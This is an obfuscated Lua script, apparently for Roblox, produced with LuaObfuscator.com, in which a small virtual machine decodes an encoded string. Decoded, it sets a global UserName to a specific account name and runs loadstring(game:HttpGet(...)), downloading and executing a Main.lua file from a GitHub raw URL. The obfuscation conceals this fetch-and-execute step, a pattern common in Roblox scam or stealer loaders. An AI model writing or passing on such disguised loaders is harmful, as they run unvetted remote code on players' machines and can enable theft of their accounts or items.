--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then local v67=0;while true do if (v67==0) then v19=v0(v3(v20,1,1));return "";end end else local v68=0;local v69;while true do if (v68==0) then v69=v2(v0(v20,16));if v19 then local v89=v5(v69,v19);v19=nil;return v89;else return v69;end break;end end end end);local function v21(v22,v23,v24)if v24 then local v70=(v22/((1008 -(360 + 646))^(v23-(2 -1))))%(2^(((v24-(1 + 0)) -(v23-(1093 -((2462 -(377 + 1430)) + 437)))) + (38 -(33 + 4)))) ;return v70-(v70%(813 -(526 + 286))) ;else local v71=(2 -0)^(v23-(1 + 0)) ;return (((v22%(v71 + v71))>=v71) and 1) or (1780 -(669 + 874 + 237)) ;end end local function v25()local v38=0 -0 ;local v39;while true do if (1==v38) then return v39;end if ((441 -(73 + 93 + 275))==v38) then v39=v1(v16,v18,v18);v18=v18 + (1049 -(521 + 49 + 478)) ;v38=1 + 0 ;end end end local function v26()local v40,v41=v1(v16,v18,v18 + (1757 -(575 + 1180)) );v18=v18 + 2 ;return (v41 * (9 + 247)) + v40 ;end local function v27()local v42,v43,v44,v45=v1(v16,v18,v18 + (11 -8) );v18=v18 + (16 -12) ;return (v45 * (9816460 + 6960756)) + (v44 * 65536) + (v43 * (248 + 8)) + v42 ;end local function v28()local v46=v27();local v47=v27();local v48=690 -(21 + 668) ;local v49=(v21(v47,3 -2 ,20) * ((411 -(161 + 248))^32)) + v46 ;local v50=v21(v47,12 + 9 ,56 -25 );local v51=((v21(v47,32)==(1 + 0)) and  -(817 -(675 + 141))) or 1 ;if (v50==((0 + 0) -0)) then if (v49==(0 + 0 + 0)) then return v51 * (0 -(0 -0)) ;else local v75=0 + 0 ;while true do if (v75==(0 + 0)) then v50=1 + 0 ;v48=197 -((86 -39) + 150) ;break;end end end elseif (v50==(833 + (4395 -3181))) then return ((v49==(0 -0)) and (v51 * (1/0))) or (v51 * NaN) ;end return v8(v51,v50-(1186 -(141 + 22)) ) * (v48 + (v49/((3 -1)^(31 + 21)))) ;end local function v29(v30)local v52=0 + (1213 -(849 + 364)) ;local v53;local v54;while true do if (v52==3) then return v6(v54);end if (v52==(1896 -(291 + 1604))) then v53=v3(v16,v18,(v18 + v30) -(1 -0) );v18=v18 + v30 ;v52=47 -(29 + 16) ;end if (v52==(1937 -(1458 + 479))) then v53=nil;if  not v30 then local v84=1260 -(552 + 708) ;while true do if (v84==(0 + 0)) then v30=v27();if (v30==(0 + 0)) then return "";end break;end end end v52=1500 -(762 + 93 + 644) ;end if (v52==2) then v54={};for v76=2 -1 , #v53 do v54[v76]=v2(v1(v3(v53,v76,v76)));end v52=1 + 2 + 0 ;end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v55=1956 -(625 + 1331) ;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v55~=0) then else v56=0;v57=nil;v55=469 -(209 + 259) ;end if (v55~=(2 -1)) then else v58=nil;v59=nil;v55=2;end if (3==v55) then v62=nil;while true do if (1~=v56) then else local v85=0;local v86;while true do if (v85==0) then v86=0;while true do if (v86~=0) then else v61=v27();v62={};v86=1;end if (v86==(293 -(196 + 96))) then local v118=0 + 0 ;while true do if ((1 + 0)==v118) then v86=1 + 1 ;break;end if (v118~=(0 + 0)) then else for v120=1,v61 do local v121=0 + 0 ;local v122;local v123;while true do if (v121==1) then if (v122==(3 -2)) then v123=v25()~=0 ;elseif (v122==(1012 -(556 + 454))) then v123=v28();elseif (v122~=3) then else v123=v29();end v62[v120]=v123;break;end if (v121==(0 -0)) then local v128=0 -0 ;while true do if (v128==(0 -0)) then local v134=0 + 0 ;while true do if (v134~=1) then else v128=1 + 0 ;break;end if (v134==0) then v122=v25();v123=nil;v134=1;end end end if (v128==1) then v121=1 -0 ;break;end end end end end v60[3 + 0 ]=v25();v118=1;end end end if (v86~=2) then else v56=1270 -(591 + 677) ;break;end end break;end end end if (v56==(0 + 0)) then local v87=0 -0 ;while true do if (v87==(1 + 0)) then v59={};v60={v57,v58,nil,v59};v87=2 -0 ;end if (v87~=(2 + 0)) then else v56=1;break;end if (v87==(245 -(149 + 96))) then v57={};v58={};v87=1;end end end if (v56==(2 + 0)) then local v88=0;while true do if (v88~=1) then else for v105=1 + 0 ,v27() do v59[v105]=v27();end return v60;end if (v88~=(1708 -(772 + 936))) then else for v107=1 + 0 ,v27() do local v108=785 -(645 + 140) ;local v109;local v110;local v111;while true do if (v108==0) then v109=0;v110=nil;v108=4 -3 ;end if (v108==1) then v111=nil;while true do if (v109==1) then while true do if (v110~=0) then else v111=v25();if (v21(v111,1 -0 ,1680 -(7 + 1672) )~=0) then else local v129=0;local v130;local v131;local v132;local v133;while true do if (v129==0) then v130=0;v131=nil;v129=1 + 0 ;end if (v129~=(1449 -(350 + 1097))) then else while true do if (v130==0) then local v158=0 -0 ;while true do if (v158~=(3 -2)) then else v130=1;break;end if (v158==0) then v131=v21(v111,1 + 1 ,933 -(525 + 405) );v132=v21(v111,11 -7 ,1519 -(655 + 858) );v158=261 -(57 + 203) ;end end end if (v130==(5 -3)) then local v159=1739 -(721 + 1018) ;while true do if (v159==1) then v130=3;break;end if (v159~=0) then else if (v21(v132,1,207 -(186 + 20) )~=(1 + 0)) then else v133[2 + 0 ]=v62[v133[2 -0 ]];end if (v21(v132,2,2)~=1) then else v133[3]=v62[v133[3]];end v159=1 + 0 ;end end end if (v130~=1) then else local v160=0 + 0 ;while true do if (v160==1) then v130=2 + 0 ;break;end if (v160~=(0 + 0)) then else v133={v26(),v26(),nil,nil};if (v131==(0 + 0)) then local v172=0 + 0 ;local v173;local v174;while true do if (v172==(1 + 0)) then while true do if (v173~=(878 -(235 + 643))) then else v174=1096 -(848 + 248) ;while true do if (v174==(0 + 0)) then v133[6 -3 ]=v26();v133[4]=v26();break;end end break;end end break;end if (0==v172) then local v182=0;while true do if (1==v182) then v172=1;break;end if (v182==0) then v173=0;v174=nil;v182=1;end end end end elseif (v131==(1085 -(762 + 322))) then v133[12 -9 ]=v27();elseif (v131==(4 -2)) then v133[3]=v27() -(2^16) ;elseif (v131==3) then local v188=0;local v189;local v190;while true do if (v188~=(1 + 0)) then else while true do if (v189==(0 + 0)) then v190=113 -(104 + 9) ;while true do if (v190==0) then v133[583 -(144 + 436) ]=v27() -((2 + 0)^16) ;v133[11 -7 ]=v26();break;end end break;end end break;end if (v188==(1943 -(66 + 1877))) then v189=0 -0 ;v190=nil;v188=3 -2 ;end end end v160=1;end end end if (v130~=3) then else if (v21(v132,1582 -(829 + 750) ,13 -10 )==(1232 -(857 + 374))) then v133[4]=v62[v133[3 + 1 ]];end v57[v107]=v133;break;end end break;end if (v129~=1) then else v132=nil;v133=nil;v129=2;end end end break;end end break;end if (v109==(0 -0)) then local v124=0;while true do if (v124==(0 + 0)) then v110=0;v111=nil;v124=1;end if ((1 + 0)==v124) then v109=1 + 0 ;break;end end end end break;end end end for v112=1,v27() do v58[v112-(1258 -(100 + 1157)) ]=v33();end v88=1 + 0 ;end end end end break;end if (v55==(1872 -(940 + 930))) then v60=nil;v61=nil;v55=3;end end end local function v34(v35,v36,v37)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v35[3];return function(...)local v78=0;local v79;local v80;local v81;local v82;local v83;while true do if (2==v78) then v83=nil;v83=function()local v90=v64;local v91=v65;local v92=v66;local v93=v32;local v94={};local v95={};local v96={};for v100=(0 + 0) -0 ,v82 do if ((v100>=v92) or ((691 -328)>=579)) then v94[v100-v92 ]=v81[v100 + 1 + 0 ];else v96[v100]=v81[v100 + (2 -1) ];end end local v97=(v82-v92) + (1001 -(736 + 264)) ;local v98;local v99;while true do local v101=599 -(370 + 229) ;local v102;local v103;while true do if ((((4982 -3608) + 270)>=(159 + 173)) and (v101==(0 -0))) then v102=547 -(321 + 226) ;v103=nil;v101=1 + 0 ;end if (((1 + (1234 -(875 + 359)))==v101) or (3426<=(400 + 1866))) then while true do if (((726 + 3247)<(6375 -(993 + 885))) and (v102==0)) then v103=(0 + 0) -0 ;while true do if (((2219 + 305)<(4181 -(35 + 127 + 1135))) and (v103==(0 -0))) then local v125=694 -((1204 -(664 + 421)) + 575) ;local v126;while true do if ((v125==(170 -(139 + 31))) or (3210<(105 + (68 -41)))) then v126=0 + 0 ;while true do if ((v126==(0 + 0)) or ((18065 -14144)>(1810 + (3798 -1187)))) then local v135=0;while true do if (((225 + 4661)>(100 + 269 + 229)) and (v135==(841 -(763 + 77)))) then v126=1 -(0 -0) ;break;end if ((v135==(0 + 0)) or ((4220 -1035)<(1127 + 316))) then v98=v90[v79];v99=v98[1926 -(1346 + 579) ];v135=574 -(135 + 310 + 128) ;end end end if ((v126==(1 -0)) or ((631 + 45)<=(108 + (324 -93)))) then v103=1;break;end end break;end end end if (((3233 -(58 + 1434))<=(2781 -(555 + (220 -119)))) and (v103==(1 -0))) then if ((v99<=(2 + 2)) or (4872<(1742 -897))) then if ((v99<=(1 + (0 -0))) or ((2292 + 2418)<(267 + 469))) then if ((4723==(6230 -((2171 -1636) + (4495 -3523)))) and (v99==(0 -0))) then v96[v98[1 + 1 ]]=v37[v98[3]];else do return;end end elseif ((v99<=2) or ((2695 -(759 + 909))>3531)) then v96[v98[2]]=v98[1138 -(274 + 861) ];elseif ((v99>(3 + 0)) or ((2873 -(254 + 470 + 479))<=(1528 -(67 + 197)))) then v79=v98[3];else v37[v98[204 -(8 + (1912 -(1384 + 335))) ]]=v96[v98[2 -0 ]];end elseif ((v99<=(13 -7)) or ((192 + 40)<(737 -(278 + 416)))) then if ((1308<2738) and (v99==5)) then if ((v96[v98[2 -0 ]]==v98[3 + 1 ]) or ((1657 + 2938)<=(355 -(34 + 3)))) then v79=v79 + (872 -(280 + 591)) ;else v79=v98[3 -0 ];end else local v140=0 + 0 ;local v141;local v142;while true do if ((((4987 -3113) -((1716 -(769 + 125)) + 197))<=(3139 + 934)) and (v140==0)) then v141=568 -(10 + 558) ;v142=nil;v140=2 -1 ;end if ((v140==(1 + 0)) or ((14764 -10076)<=688)) then while true do if ((v141==((0 + 0) -0)) or ((5453 -(36 + 1748))<96)) then v142=v98[1 + 1 ];v96[v142]=v96[v142](v13(v96,v142 + 1 + 0 ,v80));break;end end break;end end end elseif (((3394 -(1211 + 775))==1408) and (v99<=7)) then v96[v98[1 + 1 ]]();elseif (((1907 -1140)<=(186 + 1263)) and (v99>(1249 -(211 + 1030)))) then local v147=0 -0 ;local v148;local v149;local v150;local v151;local v152;local v153;while true do if (((3057 -(778 + 692))<((5281 -(1033 + 619)) + 116)) and ((1 + 0)==v147)) then v150=nil;v151=nil;v147=2;end if ((1298<(13983 -9255)) and ((0 + 0)==v147)) then v148=0 + 0 ;v149=nil;v147=1 + (0 -0) ;end if ((v147==3) or ((197 + 3264)<=((2308 -(431 + 1361)) + 1336))) then while true do if ((((8480 -3639) -(1807 + 17))>(3877 -(602 + 459))) and (v148==(1429 -(810 + 618)))) then v151=nil;v152=nil;v148=2;end if ((v148==((572 + 1065) -(649 + 988))) or (1266==(8374 -4833))) then local v175=0;while true do if (((12662 -8429)>=(4509 -(17 + 537))) and (v175==(0 -0))) then v149=0;v150=nil;v175=1 + 0 ;end if ((v175==(1247 -(538 + 708))) or ((385 + 583)<101)) then v148=1 + 0 ;break;end end end if ((v148==(9 -7)) or ((1035 + 651 + 2727)==(3156 -(596 + 1065)))) then v153=nil;while true do if ((v149==(2 + 0)) or ((644 + 134)>=(281 + 4214))) then for v186=v150,v80 do local v187=0 + 0 ;while true do if ((v187==(1564 -(1166 + 398))) or ((473 -(209 + 182))>=(11884 -7727))) then v153=v153 + (1 -0) ;v96[v186]=v151[v153];break;end end end break;end if ((1310<=(8976 -6818)) and (v149==(0 + 0))) then local v183=0;while true do if ((v183==(2 -(1 + 0))) or ((363 + (695 -388))>=(10221 -8115))) then v149=2 -1 ;break;end if (((7222 -(653 + 4596))>(895 + 315)) and (v183==0)) then v150=v98[3 -1 ];v151,v152=v93(v96[v150](v13(v96,v150 + 1 + 0 ,v98[2 + 1 ])));v183=2 -1 ;end end end if ((v149==(1 + 0)) or ((45 + 57)==2316)) then local v184=662 -(152 + 300 + 210) ;while true do if ((v184==(0 -(0 -0))) or ((3678 -(516 + 535))<=(140 -93))) then local v192=1711 -(1693 + 18) ;while true do if (((0 -0)==v192) or ((422 + 145)>=(440 + 191))) then v80=(v152 + v150) -(3 -2) ;v153=597 -((1393 -(566 + 667)) + 437) ;v192=1;end if (((269 -(135 + 133))==v192) or ((1952 -(377 + 293))>(6101 -(994 + 519)))) then v184=1;break;end end end if ((v184==((21 + 180) -(166 + 34))) or (2411<(230 + 44))) then v149=3 -(1 -0) ;break;end end end end break;end end break;end if (((869 + 2212)==(3163 -(41 + 41))) and (v147==(1 + 1))) then v152=nil;v153=nil;v147=872 -(688 + (1999 -(168 + 1650))) ;end end else local v154=0 -0 ;local v155;local v156;local v157;while true do if ((0==v154) or ((86 + 2120)<(675 -(90 + 12 + 3)))) then v155=918 -(261 + 657) ;v156=nil;v154=12 -(3 + 3 + 5) ;end if (((1 + 0)==v154) or ((3876 -(1434 + (398 -281)))>(1822 + 661))) then v157=nil;while true do if (((2017 -(43 + 362))>=(855 -505)) and (v155==(1 -0))) then v96[v156 + (391 -(91 + 299)) ]=v157;v96[v156]=v157[v98[4]];break;end if (((15082 -10771)==4311) and (v155==(36 -(10 + (42 -16))))) then local v179=626 -(313 + 313) ;local v180;while true do if ((v179==(1597 -(104 + 1493))) or ((15553 -11078)<2928)) then v180=0 + 0 ;while true do if (((7608 -5913)<=(14498 -10598)) and (v180==(1991 -(778 + 1213)))) then v156=v98[(27 -(22 + 3)) + 0 ];v157=v96[v98[24 -(15 + 6) ]];v180=1 + 0 ;end if ((4118>=(1354 -(25 + 187))) and (v180==(1 + 0))) then v155=1 + 0 ;break;end end break;end end end end break;end end end v79=v79 + (1580 -(1305 + 274)) ;break;end end break;end end break;end end end end;v78=3;end if (0==v78) then v79=1;v80= -1;v78=1;end if (1==v78) then v81={...};v82=v12("#",...) -1 ;v78=2;end if (v78==3) then A,B=v32(v11(v83));if  not A[1] then local v104=v35[4][v79] or "?" ;error("Script error at ["   .. v104   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end end end;end if (v63==0) then v64=v35[1];v65=v35[2];v63=1;end end end return v34(v33(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365724E616D6503113O004D617274616C6979615F726F626C6F2O78030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F52692O7A2F6D61696E2F4D61696E2E6C7561000F3O0012023O00013O0026053O000100010001002O043O00010001001202000100033O001203000100023O00122O000100043O00122O000200053O002008000200020006001202000400074O0009000200044O000600013O00022O0007000100010001002O043O000E0001002O043O000100012O00013O00017O000F3O00023O00043O00043O00053O00053O00063O00063O00063O00063O00063O00063O00063O00073O00083O000A3O00",v9(),...);end
